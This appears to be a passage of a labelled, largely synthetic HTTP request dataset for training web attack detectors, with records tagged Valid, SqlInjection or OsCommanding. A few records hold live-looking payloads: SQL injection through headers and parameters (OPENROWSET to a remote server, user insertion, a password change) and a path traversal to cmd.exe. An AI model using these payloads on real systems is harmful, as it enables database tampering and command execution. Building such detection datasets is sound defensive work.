Accept-Charset: x-mac-arabic, iso-8859-7;q=0.4, windows-874, iso-8859-9;q=0.8, x-mac-hebrew;q=0.5
Accept-Encoding: deflate;q=0.0, identity;q=0.6, gzip, gzip, gzip
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 200.220.239.93
Cookie: hot1rem6tovo=708361;eyhsdosehrsS=rF8Sgk;eipmlTrdit=YheieRggNidn;1o=98
Cookie2: $Version="832"
Date: Wed, 03 Jun 09 07:32:58 GMT
ETag: "4GlJvF0PI@Dj9YXMxhp"
Expect: omhhw=RiQja
From: Thdie@odkre.gov
If-Modified-Since: Sun, 24 Oct 04 07:10:15 UTC
If-Unmodified-Since: Fri, 11 Apr 08 21:49:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 993
MIME-Version: 5.9
Pragma: cna1Gst='ao'
Proxy-Authorization: Basic dGFpaGNvOm82em0=
Authorization: Basic YWVyNmVvOmVtY3JvdA==
Range: 183-486283,561-45,832-69
Referer: /rhsTl3/ar1qap.html
TE: deflate;q=0.3
Trailer: Referer
User-Agent: IHap (tKsS30FBb; utL7f9)
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 134x126
Via: FTP/4.9 www.iafdats.jpeg
Transfer-Encoding: identity
Upgrade: afyagd/6.9, Lcmr8/4.4, yHo8/4.4, oeeIe8/7.6
Warning: 695 232.32.155.255 "z2eeaslsueN" "Mon, 13 Jul 09 13:36:55 UTC"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 329196523
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23410
Start - Id: 41205
class: SqlInjection
GET /wn/8zDEaEze/e0vdRK5J/oeCQKucUvKN@4/oyJzxOmcy/nsaKsNbn98d/e1ldtmkxfnoSniaq/g1/NdropgsWK.php4?absbwbaM=423&ft=en_MGcLpxZlr&fn9arxno=v%3Ado2&qqmDO=5122&84idpdihar=64122&_QNhlocation=ceohlm&WobjectDMTWexecVodspasswd=of2aO&aanrtemotrCn=mIS-vV69&ibiddaeepSna=rebiamoeTamyy4 HTTP/1.1
Host: 34.87.83.170:80
Connection: 14ayia2d
Accept: audio/*, text/xml, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: ;   insert  into    OPENROWSET( 'SQLoledb','uid=hieaoE;pwd=eekw;Network=DBMSSOCN;Address=67.243.179.46,1433;','select   *    from  _sysdatabases'    );   select  *     from     LinkedOrRemoteSrv1.master.dbo.sysdatabases
Accept-Language: ;   EXEC(   'INS'+'ERT  INTO     users    values(767,'eEeD3','eroaiein'))
Cache-Control: min-fresh=750
Client-ip: 116.254.118.56
Cookie: sRsieie=ei;cr=36Tlc;div-4null=480;lesnluAsld=T4hfh;tttStAem1=dffBwj0vY-;asoslcts0ow=00405864
Cookie2: $Version="2"
Date: Tue, 24 Apr 07 05:42:55 UTC
ETag: "y_rtOdxyriRe@WzUIbK"
Expect: ttfr=i4irsb;s65p1tr=etl9i
From: tercor@topretr.biz
If-Modified-Since: Sun, 30 Apr 06 01:53:50 UTC
If-Unmodified-Since: Sun, 07 Sep 08 23:57:51 GMT
If-Match: "LxQep3sUwbPank@KS-Kf"
If-None-Match: "7dEOX6ERtmr7NHcFUO"
If-Range: "sQ86Wd68_f7SuJkc9gK"
Max-Forwards: 80
MIME-Version: 0.2
Pragma: sH=iteOedsg
Proxy-Authorization: Digest uri=http://www.aabnei.st/T2mnZiu/n1sace/ntAt/ohsoyate.jsp
Authorization: Basic b1N0Z1M5ZXI6M3lob3M=
Range: 53-4,37-,6-8482
Referer: http://www.0eoTA.cz/ofsWtRe/7atS/tEtrH6.sh
TE: trailers
Trailer: Expect
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 8.0; 0v-to; rv:2.3.5) Gecko/84328068
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9140x4441
Via: 7.0 185.89.50.166, HTTP/1.4 www.weseGne.js
Transfer-Encoding: identity
Upgrade: Ailo/4.2, 33e/8.5, daA/4.6, rId/6.3, euOe/7.5
Warning: 023 www.aubonl.html "brwUpele7rpookpse" "Tue, 09 Mar 10 24:01:48 CET"
X-Forwarded-For: 193.219.83.250
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41205
Start - Id: 21510
class: Valid
GET /oeLewiietp/eu70YGLs.Jy/deruSa3muweopno5m84/oDa.pl?f02PhttpnIwp-7k=1divE%3Cttzk5w&RUFlinkP=9823170&ascsb=4014650721&halmercehjnrme=ecOM&5Ctttt=ah%2BckRut&dc=aoieI&nhc6rr2e=se HTTP/1.1
Host: www.hooprncna.uk
Connection: close
Accept: image/jpeg;q=0.3, text/html;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=39
Client-ip: 129.114.252.94
Cookie: eoGoqpa3gel=93529;its=2hGig@t;boot.inilocationoIgW6=9stdin1jh7s;Sanedhuoirls=izL-JGdvG5jR;0buszjHeto=ur tq;totGzum7nwjhep=whOR13Zr5Ws
Cookie2: $Version="6"
Date: Fri, 13 Feb 09 17:27:27 GMT
ETag: W/"iv@b4s9k5Xo4jt0E3"
Expect: 100-continue
From: 8whhees@Oeeq.net
If-Modified-Since: Thu, 21 Jan 10 08:41:32 CET
If-Unmodified-Since: Mon, 12 Jan 04 18:07:04 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Oct 04 21:03:32 CET
Max-Forwards: 60
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 24-99324,2256-,752-435989
Referer: /2ieaah/9lsn/s6noor/gxee/iSahlh2h.avi
TE: trailers
Trailer: Referer
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 3.4; ne-ee; rv:0.3.3) Gecko/48003522
UA-CPU: Sparc
UA-Disp: 028,1328,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5415x3665
Via: 3.3 88.122.80.40:2
Transfer-Encoding: compress
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21510
Start - Id: 9181
class: Valid
GET /dkssenas5ag/wM1I-WJb/9v4i@nqHH91qhw/seeeeDjpuiasstihT/m.bCYJE.cgi?NhzkE=awqR&btrsfN=ue3yia&rcngTn=b0netcatqE&qedQ0Lthg=7511731&FF.hFzWGentmp=5nnde%3AesCnwgetrae&rmAo=3&tfteano8dodla=endivrntclaee1Qa&toreted=3duanir&Rsattfs=751&t1ot7keaot34ts=Ut+on8hbedsmn&t84dljdQP5s=e++%2Fi&sczntttshsrT=89016&wfandioptFlYiB=664861 HTTP/1.0
Host: www.mnPuu.uk
Connection: keep-alive
Accept: video/quicktime, audio/basic, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.3, deflate
Accept-Language: AeiEib-roee, uTh6ou-5, l-ogeEnu7, makobdu-rere
Cache-Control: max-age=7980
Client-ip: 177.92.189.222
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="66"
Date: Tue, 14 Sep 04 15:21:51 GMT
ETag: W/"GQzYez5kFT-UMY.Qx"
Expect: laeeo
From: oeys@nr3fshd.org
If-Modified-Since: Sat, 31 Dec 05 20:21:03 CET
If-Unmodified-Since: Mon, 31 Dec 07 19:54:42 CET
If-Match: *
If-None-Match: "713fjdXl7.K-G.FN"
If-Range: Tue, 23 Oct 07 17:12:22 GMT
Max-Forwards: 8925
MIME-Version: 8.7
Pragma: zarsirr=taNws
Proxy-Authorization: NTLM bmRlZ3JoZmEzbmlQZ29kSWJOb25ydDFvb1VubjZlOHJk
Authorization: Basic c2V0NzNlZWw6b2VlMDJlcQ==
Range: 57164-,9027-962000
Referer: /taooxtAi.ace
TE: trailers
Trailer: Range
User-Agent: seeTdtsnEl
UA-CPU: StrongARM
UA-Disp: 226,033,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3033x117
Via: 1.2 110.190.18.232, 1.5 127.9.204.128:53, HTTP/0.0 239.221.206.206
Transfer-Encoding: compress
Upgrade: mY1vt/8.8, noSoks/5.1, eadt/2.7, rosqo/9.6, on9ue/5.8
Warning: 029 www.rgnrlhe.js "hetef0djrse" "Sun, 29 Aug 04 17:38:57 GMT"
X-Forwarded-For: 146.140.80.245
X-Serial-Number: 51512121332021601
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9181
Start - Id: 34899
class: Valid
POST /eZQOEMrqQ6ib.IyU-9./2y.htm? HTTP/1.1
Content-Length: 272
Content-Language: y,fwrrma,ctlorot
Content-Encoding: identity
Content-Location: http://www.thetlfz.com/jhAaA/aatro/ytpano.jsp
Content-MD5: dGl3aGg0ZXdibGZkcnNUdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Dec 08 18:31:42 UTC
Last-Modified: Sun, 11 Nov 07 06:01:51 GMT
Host: www.1nQuw.ch
Connection: keep-alive
Accept: video/mpeg;q=0.1, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.3, identity, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 180.36.30.16
Cookie: aaH4tdfedI=igVqrFkP;3elhnhudteao=Nmaksudroeccz;ane=asutsenyie;meNT=0itl;shmwgleein=6487683;iiq=mho
Cookie2: $Version="3"
Date: Thu, 26 Nov 09 02:50:59 UTC
ETag: "5lAPcwfzVebhemf"
Expect: 100-continue
From: auaes4Eh@tlwea3.gov
If-Modified-Since: Tue, 13 Dec 05 07:35:10 GMT
If-Unmodified-Since: Sat, 20 Nov 04 13:03:41 UTC
If-Match: "Db@4NzfPyl94n_l_1bsT"
If-None-Match: *
If-Range: Sun, 27 Feb 05 10:14:19 GMT
Max-Forwards: 94
MIME-Version: 7.0
Pragma: th=nXtL6grh
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Digest response="CEE0aD7DaB0De84DAb2e2aB49D154D37"
Range: 817-
Referer: http://ALihu.biz/eouie.cgi
TE: chunked;q=0.6,deflate;q=0.6,gzip
Trailer: If-Modified-Since
User-Agent: cWQGrd@Im http://www.iurijd.org
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: 1.3 75.160.12.221, 7.8 10.175.145.108
Transfer-Encoding: gzip
Upgrade: minhlz/2.0, gtr/0.2, nusiot/8.5
Warning: 293 www.ds0swdh.css "fM4geas0hcalM" "Sat, 19 Aug 06 22:31:17 GMT"
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 373470413656651494
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PEimgP3F=mdexgXJ&9nixhsafdDEo5=usHbbdiieuwxkiSj&sAttie=k%npsesurlz2aepassthru nieeval&drheYnlvnMaad=dtWWOXFS&xa=gaV&nvhseyzeTgdmpo=kdteEautnAdwE1dea&ta7gn4ogrii6=aoiqpedtrh&lttncwa=ucdcei&sailioMl=ee &it6reaorii=tdy&ieDhateXr=pkFGO_Ljlz&gi3.kCs=3293&E1tOtgesm8e87A=48965

End - Id: 34899
Start - Id: 9536
class: Valid
GET /8gYlNXh.x8I/cx6r1aDxtermO/lgC/zv/XTEusr8FK/eaf1tia7/OhtpassU6Gpositionetcn/lOTf5mom/o7IlLot5eEdTvhe4s/c.TcxTyK47t.php3?JxTE5SftpEbididf=bsGS5LAAVU&3hglrnuuunnnt=%25e%25r%3Bm%25enMheei&enAteeagewso=3%26joe4Yct%7Candnull HTTP/1.0
Host: www.ixvac3f.com
Connection: eeirx9L
Accept: text/html;q=0.7, text/*
Accept-Charset: iso-8859-3
Accept-Encoding: compress, gzip, compress;q=0.8, compress, gzip;q=0.6
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 68.90.53.63
Cookie: ubsksr=ibi'cadd- jorfl;aosoadaRdee2=0;notisedcb1oere=mb0vs;dewzmkah3be=01
Cookie2: $Version="8"
Date: Sun, 06 Mar 05 06:06:32 GMT
ETag: W/"@ooEB@uaCNN9tFEzz0"
Expect: 100-continue
From: anp51@cLdyyihltw.st
If-Modified-Since: Wed, 01 Dec 04 16:09:33 UTC
If-Unmodified-Since: Tue, 02 Jun 09 21:38:37 GMT
If-Match: "nelsOg7oWQ8xKcW7"
If-None-Match: "sJfAdEO.xBGb@3oPl"
If-Range: Thu, 20 Dec 07 13:11:21 GMT
Max-Forwards: 8
MIME-Version: 2.5
Pragma: e='rsvrH'
Proxy-Authorization: Digest uri=http://wotOwyth.de/SaOoudi/Oooe/hwdos4ni/0vrssema/4mBs.php4
Authorization: Basic b29qdE5qdDo1c0VpRWk=
Range: -473707,-784763,883586-54671
Referer: http://www.t9q5.cz/5afL/n6x9aThe.mp3
TE: gzip,trailers,chunked
Trailer: TE
User-Agent: salahmt/8.0
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1124x1179
Via: HTTP/5.1 www.egehszv.jpg, 0.7 172.235.254.65
Transfer-Encoding: compress
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 107.141.77.183
X-Serial-Number: 2426894
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9536
Start - Id: 43701
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 116.41.146.129
Connection: 5nno6Y
Accept: image/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress;q=0.0, gzip;q=0.2
Accept-Language: e3-a;q=0.9, GdgOee-tgm;q=0.2, ipismk-nsap, egrerir-etm
Cache-Control: max-stale
Client-ip: 152.233.157.213
Cookie: -andz.ClQEE6bx=41;1gTnogteul=mn4h\q0aius&/3e nmi
Cookie2: $Version="916"
Date: Sun, 07 Mar 04 24:26:30 GMT
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Sat, 02 Jul 05 10:07:28 CET
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: *
If-Range: "ayE5StEBc5.RGeB-K"
Max-Forwards: 4014
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest nc=D9942BcD
Range: 63-,-3595
Referer: /e2ist.tar.gz
TE: deflate;q=0.6,gzip;q=0.4,trailers
User-Agent: Mozilla/0.4 (compatible; o8tf; Linux i386; cRaeada; odtioQc7)
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: 2.6 115.72.82.89, ofnN/5.0 120.196.83.9
Transfer-Encoding: gzip
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 253.164.33.60
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43701
Start - Id: 41874
class: SqlInjection
GET /openDR/w9GXVJRbn_GgNMr/onrnghgx9heau/gSPBtK6sOtnzV.5LZp/meuaelssl/so9WviKqO0/aTLB1u4bf5HrZcRno/2wrdsenen0o/kAfot/faei2lgSytokEiI/oimvasn.mspx?yefbuNt0tD7eetr=8421319&o55tnus9lstttl=ntiTsI%5CH%26&4tuibhVA=blip1l&uv9irnrlrniEtxa=dbp5wGWl&ja.n2OyZh9=OR+++++%27ooeerER%27++++LIKE++%27Sim%25%27&aa5hlizm6tO=9542&Ptqtesyy2thtsmp=es6kr4tSoiyeo7ebe&fniTnhd=eEwZnOcW7b&sV0SS6zocphpIQ=eN%28&fegeikiaer5e=wey+tmp&LuAbzrhihhw=rt0siq&ayywmIaEsnohllt=106&eatcieEt=eef%25emodohichildyad HTTP/1.0
Host: www.nlra.fr:3
Connection: 22aeaei
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity
Accept-Language: t-bp8;q=0.4, osDd-dt;q=0.1
Cache-Control: yovEthm='e'
Client-ip: 151.178.225.162
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="01"
Date: Thu, 25 Dec 08 02:56:48 GMT
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Mon, 05 May 08 21:01:52 CET
If-Unmodified-Since: Tue, 19 Oct 04 05:20:34 GMT
If-Match: "zN46Y0TmmL92d7q1-fS"
If-None-Match: *
If-Range: Mon, 01 Nov 04 08:58:29 CET
Max-Forwards: 0
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: Basic b2VlZ3c6bmFuSGF6
Range: 2764-93323,17883-91
Referer: /nc0atoe/ae1yrern/xoIod.tiff
TE: trailers,deflate;q=0.3,trailers
Trailer: Date
User-Agent: tPjie (o7KMFlyFcu)
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: etroo/3.6 www.coao.css:6
Transfer-Encoding: compress
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 33704248
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41874
Start - Id: 42025
class: SqlInjection
GET /oMtEj0jQC/LnS9RSuPVAH4Tc/JW/amyd/lBdjMa.x3SLtdP_oJ3/ZX4iW/ry8A1ppxGqA_r7kMvh/ohuq6vea0shIvOy.css?SeeaOrqcddnnkyw=td97kMadn5&nodeRKOffcYr=248&aqLxstezbE=%3Balter+table++storsensli+set+++++password+++%3D++%27feoC%27+++where+name+++%3D+++++%273iohae%27%3B HTTP/1.1
Host: 156.186.201.142
Connection: keep-alive
Accept: application/postscript;q=0.9, text/xml, audio/basic
Accept-Charset: isiri-3342, iso-8859-8-i, iso-8859-7
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: min-fresh=97
Client-ip: 144.52.64.113
Cookie: VESOaBBvfJg=rS.0KXr;RFITvgahYMBZ=~g9tr A
Cookie2: $Version="334"
Date: Thu, 22 Apr 10 13:30:28 UTC
ETag: "xrVUfSsUKUujhJHXyI"
Expect: ouiSlPr
From: eliqs@octere.st
If-Modified-Since: Wed, 13 Apr 05 03:35:36 GMT
If-Unmodified-Since: Sat, 31 Dec 05 10:00:25 CET
If-Match: *
If-None-Match: "9H5W6dYxVcKJ1MvM9"
If-Range: "gghkTF6AUe5h4pJ"
Max-Forwards: 6752
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest response="8EBC6AbfdcBAA2fEA94dfDD61baEC0de"
Authorization: Digest opaque="4venij"
Range: 4936-0,-6636
Referer: http://chwumh8a.ch/okrHeopo/thttwsed.dll
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: fe9ileQcn/6.6.5
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0057x268
Via: HTTP/1.6 211.99.188.186:4962, 9.0 89.96.129.153:48917, FTP/3.8 www.u3lie.shtml
Transfer-Encoding: compress
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42025
Start - Id: 33476
class: Valid
PUT /1xa4OGm/aNkHiCrkojEum/tB0VHaWG5_BjD./HipnYnp31na.jpg? HTTP/1.0
Content-Length: 246
Content-Language: wzbg,E
Content-Encoding: gzip
Content-Location: http://elub.de/gtidlab.css
Content-MD5: ZWFtZ2lhbjl0cnhhaW55YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Jun 09 19:53:44 GMT
Last-Modified: Fri, 20 Mar 09 20:07:02 UTC
Host: www.ooVf.com:80
Connection: iasfWo
Accept: audio/x-wav
Accept-Charset: isiri-3342;q=0.5, isiri-3342;q=0.6
Accept-Encoding: 
Accept-Language: nonsii-sd, eom8e-ueees0tq;q=0.0
Cache-Control: max-age=530
Client-ip: 4.134.108.29
Cookie: ekc1m=0;E1Snph-K0zautoexecIlMA=iYtdWsaH;ineNodt=k?Gswrr v'xml|ici ;dlstirnxweyh=nwhereeo$;rbqV-jC=e1nakiyeirtjtw
Cookie2: $Version="2"
Date: Wed, 26 Nov 08 01:37:34 CET
ETag: "N@YIkvlv7W2brt-"
Expect: 100-continue
From: haatwh@aC7Dxl.ch
If-Modified-Since: Thu, 14 Sep 06 21:57:45 CET
If-Unmodified-Since: Thu, 14 Aug 08 11:20:00 CET
If-Match: *
If-None-Match: "DYsryL-@fqnWdaZ2"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.0
Pragma: npi=AehEa
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: mieim xs3eri=uneaLo4
Range: 408-106,8887-956063
Referer: http://hath.uk/6eiueMms/gu5e/nseoob/oyEdKi/zib0.js
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: klohI/8.7.1.2
UA-CPU: Sparc
UA-Disp: 0089,4532,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: urjha/8.6 www.9sahl.jpg
Transfer-Encoding: compress
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 159.146.237.86
X-Serial-Number: 944908095975390
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4eeioeh=p<&BztWutN=ankLubj%ke5em&0al=07122&wtoe2eelu=rpa&tztrt8wty=93235930&nlwdgaiqbItteLa=2a@bQL_-wJ&gc0funrknoeja=tefQZHz81AQO&lmtlaee=4&Estlscniiehad=832028&niuonmtIgn=3epositionrg aiutrcpe&betweenw5YnW=euKxyan2&gpotolgiy2utoh=euusrf$

End - Id: 33476
Start - Id: 33893
class: Valid
POST /hm_PKJeoH0nuS/larocu3etuam/oah_OZFbm2z.asmx? HTTP/1.0
Content-Length: 363
Content-Language: nsaacE,ah8,chS
Content-Encoding: identity
Content-Location: http://www.hunxt.gov/valkb5/eti3uot/KelsaH.avi
Content-MD5: cm9Jbjluc29wQWN1aXl0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Sep 07 09:30:54 CET
Last-Modified: Wed, 11 May 05 11:46:48 CET
Host: 182.25.97.247
Connection: 5liiab8
Accept: */*
Accept-Charset: utf-8, euc-jp;q=0.3, cp-950, cp-932;q=0.5, iso-8859-7
Accept-Encoding: identity, gzip, deflate, identity;q=0.0
Accept-Language: *;q=0.0
Cache-Control: min-fresh=76
Client-ip: 163.235.212.144
Cookie: d4Eaa=oKabjTZ5n;1varexec07iwp-2FRH=xfo5n;nym=602462101
Cookie2: $Version="187"
Date: Sat, 02 Dec 06 22:53:59 CET
ETag: W/"bFnz7ddaqy.0cE1"
Expect: 100-continue
From: tietc@t0ytt.net
If-Modified-Since: Wed, 05 Mar 08 01:19:20 UTC
If-Unmodified-Since: Mon, 27 Sep 04 06:36:01 UTC
If-Match: *
If-None-Match: *
If-Range: "OyyK6Hal-lPTRHZ26hN"
Max-Forwards: 6465
MIME-Version: 1.6
Pragma: pemiEset=v
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: les4s rtcIc=tswor
Range: 254982-39
Referer: http://hsla.uk/ateyenev/tcsalz.bin
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 5.2; sN-rd; rv:2.2.2) Gecko/89941856
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1982x002
Via: 9.0 www.4klrS.gif, ie5i/3.0 250.92.8.108
Transfer-Encoding: identity
Upgrade: ict/4.3, tseu/9.1, eolz/4.5, eeiuje/9.5
Warning: 650 www.SRhlh0nf.jpeg "naorss8mXmrab" "Sat, 28 Mar 09 21:13:32 GMT"
X-Forwarded-For: 197.252.39.199
X-Serial-Number: 6132370347859311136
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

2hsiirrn6sec1ea=ebp3&rdpsoaEchsaot= uirr&al~se&5blxM=oy<e4systemuwheredwnr&tfaSneehlnt2cqi=9n-ogndmn0o&qQorumMj8s1tq=dropssroeheth wugtaaa7&zeOlcpklneuie8d=k1CQ5fk2Ldo&tecea=OsvieScet6a&mttelnNn=icopydivpo(cmd>rx 4w6hrcpSounionE&ecm1evlieN=eepop3a'roef&etbjoRt4kie=e&copyTabs6=de\0w;aun&ugrn1tmnaniW=oSz&nrczula7h3dsvnm=exc1eE&ca0vEh00ah6ttdl=eFsh

End - Id: 33893
Start - Id: 19267
class: Valid
GET /eaq35flu/uXVP4QTeR_OO1bG9/49T4lTrqJSR3_py3Lmea/ond/r8/i1ZwlpAmavD2PXK1ZOKA/uQt0zWAWtMd/yd7ad3spmsrRoynj/e8heD1NJTRIUqb-Ltb3/uinnie6yVsir2sEt.cfm?rd=afnteoab5nRe5th&edopodwddrorr=39579674&vl4ts=165296&jclo1picsop=copyG&SVdivGH=tdpotxtermb&lai9saeoUnnSo=n21ZJ4k&dz=9104&sOstergheho=sP21z HTTP/1.0
Host: 77.186.66.252:44642
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 119.151.125.177
Cookie: u6donsai65aon=03
Cookie2: $Version="3"
Date: Sat, 24 Apr 10 14:03:35 CET
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: v3eiit=esirldoa
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Fri, 03 Sep 04 04:26:31 GMT
If-Unmodified-Since: Mon, 29 Dec 08 03:45:40 UTC
If-Match: *
If-None-Match: "I7f6UUE6lpi402UKaCUK"
If-Range: *
Max-Forwards: 9224
MIME-Version: 5.9
Pragma: aqsS=myics
Proxy-Authorization: e7tscd nsp1=az9orp3
Authorization: NTLM aGxhYXRveWVwaGllb3F6WXRjaXVhT2R0Z01hc3JsVXJuYXR0Umhuc1BjbHRuc3Y=
Range: -9624,44-
Referer: http://ntgfsR.be/Sr0sihd/tsa41/6trOa.mdb
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/3.4 (X11; U; Solaris 1.7; yS-iX; rv:5.0.7) Gecko/29136232
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3141x1930
Via: 3.7 www.kopptec.png:32153, HTTP/2.4 www.rrd1tmoi.html
Transfer-Encoding: Pe9Tn
Upgrade: hi5nal/8.0, hn5t/9.2, ykhito/3.3, 43fett/7.0, nnahn/6.1
Warning: 197 33.215.121.199 "ikjti0rMM2eujtmcrtse" 
X-Forwarded-For: 169.230.8.187
X-Serial-Number: 9449632282194907610
----: --------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 19267
Start - Id: 3298
class: Valid
GET /eanv3/vJuziframeG/0ef1eadeefletEdvj/lXHGWtsFb.r16/wKb/Gt6KUJVvOv/ewi/nPYY50lF6ovE/gs.htm? HTTP/1.0
Host: www.zxiniceb.com
Connection: jw60
Accept: */*;q=0.3
Accept-Charset: euc-tw
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: max-stale=17123
Client-ip: 25.206.2.134
Cookie: 9asstAc=rD_xJru;loaAlkin=qiatla%;ie3roD5n=hBksiaImemakzenrnn;cetoy0i4io=emapasswdti wpiee;7fHettt=passwd;ewkirsi5etrI=4544863718
Cookie2: $Version="250"
Date: Sun, 22 Nov 09 23:47:29 UTC
ETag: W/"B6CYsOrycHzh8pC52VW"
Expect: 100-continue
From: ynnst@syowo.org
If-Modified-Since: Sat, 02 Feb 08 09:52:35 UTC
If-Unmodified-Since: Sat, 09 Oct 04 23:51:19 CET
If-Match: "PtC@jkQPUnBmz09fv"
If-None-Match: "jjKkZ2xpXk6R0I0rhBT"
If-Range: Sun, 18 Dec 05 12:19:30 CET
Max-Forwards: 34
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: Basic bGVyMGp3aTplb2puYQ==
Range: 715429-,64862-,731-870612
Referer: /cxbt.pl
TE: trailers,gzip;q=0.8,trailers
Trailer: Upgrade
User-Agent: rtn1n (a9k1y05Ak; mX4f7u; aJ2B6HLi)
UA-CPU: PowerPC
UA-Disp: 517,125,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 179x3842
Via: 3.7 www.6ieaia.png
Transfer-Encoding: gzip
Upgrade: bmdsep/9.4
